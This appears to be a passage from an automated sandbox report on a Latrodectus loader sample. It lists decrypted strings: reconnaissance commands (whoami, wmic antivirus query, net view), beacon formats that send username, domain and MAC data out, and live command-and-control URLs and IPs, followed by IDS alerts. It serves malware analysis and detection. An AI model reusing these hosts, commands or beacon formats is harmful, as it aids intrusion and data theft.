            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c net config workstation
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c whoami /groups
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &systeminfo=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &domain_trusts=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &domain_trusts_all=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &net_view_all_domain=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &net_view_all=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &net_group=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &wmic=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &net_config_ws=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &net_wmic_av=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &whoami_group=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "pid":
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "%d",
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "proc":
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "%s",
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "subproc": [
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &proclist=[
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "pid":
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "%d",
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "proc":
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "%s",
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "subproc": [
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &desklinks=[
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: *.*
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "%s"
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Update_%x
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Custom_update
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: .dll
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: .exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Error
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: runnung
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %s/%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: front
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /files/
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Lambda
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Cookie:
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: POST
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: GET
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: curl/7.88.1
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: CLEARURL
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: URLS
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: COMMAND
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: ERROR
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: [{"data":"
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: "}]
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &dpost=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: https://reateberam.com/test/
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: https://dogirafer.com/test/
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: \*.dll
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: AppData
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Desktop
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Startup
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Personal
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Local AppData
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: <html>
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: <!DOCTYPE
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %s%d.dll
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Content-Length: 0
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Content-Type: application/dns-message
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: Content-Type: application/ocsp-request
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: 12345
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: 12345
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &stiller=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %s%d.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %x%x
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &mac=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %02x
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: :%02x
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &computername=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &domain=%s
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: LogonTrigger
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: \Registry\Machine\
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: TimeTrigger
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: PT0H%02dM
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: PT0S
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: \update_data.dat
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7AC00 CryptStringToBinaryA,swprintf,LocalAlloc,swprintf,CryptStringToBinaryA,swprintf,CryptDecodeObjectEx,swprintf,LocalAlloc,swprintf,CryptDecodeObjectEx,swprintf,CryptImportPublicKeyInfoEx2,swprintf,LocalAlloc,swprintf,swprintf,swprintf,BCryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00007FF8A8D7AC00
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7CEB0 BCryptOpenAlgorithmProvider,swprintf,BCryptGetProperty,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptExportKey,swprintf,3_2_00007FF8A8D7CEB0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7C3D0 BCryptOpenAlgorithmProvider,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapFree,BCryptDestroyHash,BCryptCloseAlgorithmProvider,3_2_00007FF8A8D7C3D0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7B720 swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptDecrypt,swprintf,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,BCryptDestroyKey,3_2_00007FF8A8D7B720
            Source: C:\Windows\explorer.exeCode function: 8_2_0E455E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,8_2_0E455E5C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E455FE4 CryptUnprotectData,8_2_0E455FE4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E515C60 CryptUnprotectData,8_2_0E515C60
            Source: C:\Windows\explorer.exeCode function: 8_2_0E458568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,8_2_0E458568
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,8_2_0E45453C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E456078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,8_2_0E456078
            Source: unknownHTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2
            Source: wait.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF
            Source: Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4538924938.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.4538185673.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, wait.dll.dll

            Spreading

            barindex
            Performs a network lookup / discovery via net view
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,3_2_00007FF8A8D72E90
            Source: C:\Windows\explorer.exeCode function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0303A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_03032B28
            Source: C:\Windows\explorer.exeCode function: 8_2_030404C0 FindFirstFileW,8_2_030404C0
            Source: C:\Windows\explorer.exeCode function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0838A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_083904C0 FindFirstFileW,8_2_083904C0
            Source: C:\Windows\explorer.exeCode function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_08382B28
            Source: C:\Windows\explorer.exeCode function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0885A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_088604C0 FindFirstFileW,8_2_088604C0
            Source: C:\Windows\explorer.exeCode function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_08852B28
            Source: C:\Windows\explorer.exeCode function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,8_2_0E456604
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0E4516F4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E515C40 FindFirstFileW,FindClose,8_2_0E515C40
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F50D8 FindFirstFileA,8_2_0E4F50D8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize,8_2_0E4F5088

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49928 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49941 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49922 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49972 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50009 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50007 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50000 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49999 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49986 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50001 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50013 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50015 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49950 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50002 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49980 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50014 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49962 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50010 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50021 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50003 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50025 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50011 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50019 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50018 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50030 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50032 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50017 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50026 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50036 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50008 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50023 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50033 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50039 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50037 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50006 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49995 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49916 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50035 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50024 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49934 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50034 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49907 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50038 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50020 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50027 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50016 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50004 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50012 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50029 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50031 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50022 -> 172.67.217.190:443
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.68.89 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.217.190 443Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 103.57.249.207 6542Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.43.224 6542Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://reateberam.com/test/
            Source: Malware configuration extractorURLs: https://dogirafer.com/test/
            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 103.57.249.207:6542
            Source: global trafficTCP traffic: 192.168.2.5:49713 -> 94.232.43.224:6542
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN
            Source: Joe Sandbox ViewASN Name: WELLWEBNL WELLWEBNL
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49907 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49916 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49928 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49934 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49941 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49950 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49962 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49968 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49972 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49980 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49986 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49995 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49999 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50000 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50003 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50004 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50005 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50007 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50010 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50008 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50001 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50006 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50011 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50002 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50009 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50014 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50013 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50016 -> 172.67.217.190:443
